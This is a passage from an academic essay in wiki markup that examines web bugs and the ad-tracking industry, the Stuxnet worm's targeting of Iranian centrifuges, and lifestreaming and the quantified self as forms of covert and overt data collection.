real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions (see Parry, 2011). Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2012)]] ''Image 1: Display Advertising Technology Landscape (Luma, 2012)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012).&amp;amp;nbsp; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website, it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. The analysis performed by Langner (2011) and others, was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus (see Sanger, 2012). Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
  [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents -- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions about the increasing use of mathematics and computation to understand and control the self. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions, particularly in relation to the complexity and obfuscated nature of the code and its ability to track and collect data surreptitiously. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways life 